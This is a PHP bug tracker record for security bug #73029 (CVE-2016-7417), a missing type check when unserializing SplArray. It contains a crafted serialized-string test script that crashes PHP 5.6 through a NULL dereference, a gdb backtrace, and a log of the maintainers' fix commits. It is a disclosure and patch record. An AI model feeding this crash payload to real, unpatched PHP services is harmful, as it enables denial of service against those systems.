PHP :: Sec Bug #73029 :: Missing type check when unserializing SplArray

Sec Bug #73029	Missing type check when unserializing SplArray
Submitted:	2016-09-06 09:45 UTC	Modified:	2016-09-16 13:41 UTC
From:	ahihibughunter at gmail dot com	Assigned:	stas (profile)
Status:	Closed	Package:	SPL related
PHP Version:	5.6.26RC1	OS:	ALL
Private report:	No	CVE-ID:	2016-7417

View Developer Edit

Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.

Password:

Status:
Package:
Bug Type:
Summary:
From:	ahihibughunter at gmail dot com
New email:
PHP Version:		OS:

New Comment:

[2016-09-06 09:45 UTC] ahihibughunter at gmail dot com

Description:
------------
The return value is not checked and used on spl_array_get_dimension_ptr_ptr

static zval **spl_array_get_dimension_ptr_ptr(int check_inherited, zval *object, zval *offset, int type TSRMLS_DC) /* {{{ */
{
....
HashTable *ht = spl_array_get_hash_table(intern, 0 TSRMLS_CC); <--- here is not check ht with NULL

} 

Test script:
---------------
<?php
$a = 'C:11:"ArrayObject":19:0x:i:0;r:2;;m:a:0:{}}';
$m = unserialize($a);
$x = $m[2];
?>

Expected result:
----------------
No crash

Actual result:
--------------
$ gdb /data/php-src-PHP-5.6.26/sapi/cli/php
GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1
(gdb) r se.php
Starting program: /data/php-src-PHP-5.6.26/sapi/cli/php se.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x0000000000ac08e3 in _zend_is_inconsistent (ht=0x0, file=0x10d3b78 "/data/php-src-PHP-5.6.26/Zend/zend_hash.c",
    line=938) at /data/php-src-PHP-5.6.26/Zend/zend_hash.c:60
60              if (ht->inconsistent==HT_OK) {
(gdb) bt
#0  0x0000000000ac08e3 in _zend_is_inconsistent (ht=0x0, file=0x10d3b78 "/data/php-src-PHP-5.6.26/Zend/zend_hash.c",
    line=938) at /data/php-src-PHP-5.6.26/Zend/zend_hash.c:60
#1  0x0000000000ac3625 in zend_hash_index_find (ht=0x0, h=2, pData=0x7fffffffaaf0)
    at /data/php-src-PHP-5.6.26/Zend/zend_hash.c:938
#2  0x000000000089621a in spl_array_get_dimension_ptr_ptr (check_inherited=1, object=0x7ffff7fc50b8,
    offset=0x7ffff7fc7940, type=0) at /data/php-src-PHP-5.6.26/ext/spl/spl_array.c:357
#3  0x000000000089664b in spl_array_read_dimension_ex (check_inherited=1, object=0x7ffff7fc50b8,
    offset=0x7ffff7fc7940, type=0) at /data/php-src-PHP-5.6.26/ext/spl/spl_array.c:406
#4  0x000000000089679b in spl_array_read_dimension (object=0x7ffff7fc50b8, offset=0x7ffff7fc7940, type=0)
    at /data/php-src-PHP-5.6.26/ext/spl/spl_array.c:434
#5  0x0000000000af40b6 in zend_fetch_dimension_address_read (result=0x7ffff7f901e0, container=0x7ffff7fc50b8,
    dim=0x7ffff7fc7940, dim_type=1, type=0) at /data/php-src-PHP-5.6.26/Zend/zend_execute.c:1364
#6  0x0000000000b4ae0a in ZEND_FETCH_DIM_R_SPEC_CV_CONST_HANDLER (execute_data=0x7ffff7f90260)
    at /data/php-src-PHP-5.6.26/Zend/zend_vm_execute.h:32849
#7  0x0000000000af5196 in execute_ex (execute_data=0x7ffff7f90260)
    at /data/php-src-PHP-5.6.26/Zend/zend_vm_execute.h:363
#8  0x0000000000af521f in zend_execute (op_array=0x7ffff7fc5fd8)
    at /data/php-src-PHP-5.6.26/Zend/zend_vm_execute.h:388
#9  0x0000000000ab0372 in zend_execute_scripts (type=8, retval=0x0, file_count=3)
    at /data/php-src-PHP-5.6.26/Zend/zend.c:1341
#10 0x0000000000a15aa2 in php_execute_script (primary_file=0x7fffffffd200)
    at /data/php-src-PHP-5.6.26/main/main.c:2613
#11 0x0000000000b64a18 in do_cli (argc=2, argv=0x1460a90) at /data/php-src-PHP-5.6.26/sapi/cli/php_cli.c:994
#12 0x0000000000b65d71 in main (argc=2, argv=0x1460a90) at /data/php-src-PHP-5.6.26/sapi/cli/php_cli.c:1378

Patches

Pull Requests

Pull requests:

Add commit ID to build info (doc-base/17)
新增过滤器相关的翻译 (doc-zh/17)

History

AllCommentsChangesGit/SVN commitsRelated reports

[2016-09-12 02:53 UTC] stas@php.net

-Summary: _zend_is_inconsistent null dereference +Summary: Missing type check when unserializing SplArray

[2016-09-12 03:38 UTC] stas@php.net

-Assigned To: +Assigned To: stas

[2016-09-12 03:38 UTC] stas@php.net

The fix is in security repo as 6d16288150be33392a3249e417a0929881feb9a2 and in https://gist.github.com/b243ac0ce783c0d286d2619e3d6651d6

please verify

[2016-09-12 04:23 UTC] stas@php.net

-CVE-ID: +CVE-ID: needed

[2016-09-12 05:13 UTC] ahihibughunter at gmail dot com

This patch look OK.

[2016-09-13 04:04 UTC] stas@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=ecb7f58a069be0dec4a6131b6351a761f808f22e
Log: Fix bug #73029 - Missing type check when unserializing SplArray

[2016-09-13 04:04 UTC] stas@php.net

-Status: Assigned +Status: Closed

[2016-09-13 04:06 UTC] stas@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=022e75cba104c52ccfb494ce224c2c4d0ff2dddc
Log: Fix bug #73029 - Missing type check when unserializing SplArray

[2016-09-13 04:09 UTC] stas@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=022e75cba104c52ccfb494ce224c2c4d0ff2dddc
Log: Fix bug #73029 - Missing type check when unserializing SplArray

[2016-09-13 04:11 UTC] stas@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=022e75cba104c52ccfb494ce224c2c4d0ff2dddc
Log: Fix bug #73029 - Missing type check when unserializing SplArray

[2016-09-13 09:02 UTC] ab@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=ecb7f58a069be0dec4a6131b6351a761f808f22e
Log: Fix bug #73029 - Missing type check when unserializing SplArray

[2016-09-15 09:30 UTC] tyrael@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=589cfc7d0ebbc2399b6cbac3351ae26d569e9600
Log: Fix bug #73029 - Missing type check when unserializing SplArray

[2016-09-16 13:41 UTC] kaplan@php.net

-CVE-ID: needed +CVE-ID: 2016-7417

[2016-10-17 10:08 UTC] bwoebi@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=ecb7f58a069be0dec4a6131b6351a761f808f22e
Log: Fix bug #73029 - Missing type check when unserializing SplArray

[2016-10-17 10:08 UTC] bwoebi@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=022e75cba104c52ccfb494ce224c2c4d0ff2dddc
Log: Fix bug #73029 - Missing type check when unserializing SplArray

[2021-05-31 09:38 UTC] hu dot chuckie at gmail dot com

The following pull request has been associated:

Patch Name: Add commit ID to build info
On GitHub:  https://github.com/php/doc-base/pull/17
Patch:      https://github.com/php/doc-base/pull/17.patch

[2021-05-31 09:39 UTC] hu dot chuckie at gmail dot com

The following pull request has been associated:

Patch Name: 新增过滤器相关的翻译
On GitHub:  https://github.com/php/doc-zh/pull/17
Patch:      https://github.com/php/doc-zh/pull/17.patch

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2024 The PHP Group All rights reserved.	Last updated: Thu Nov 21 14:01:29 2024 UTC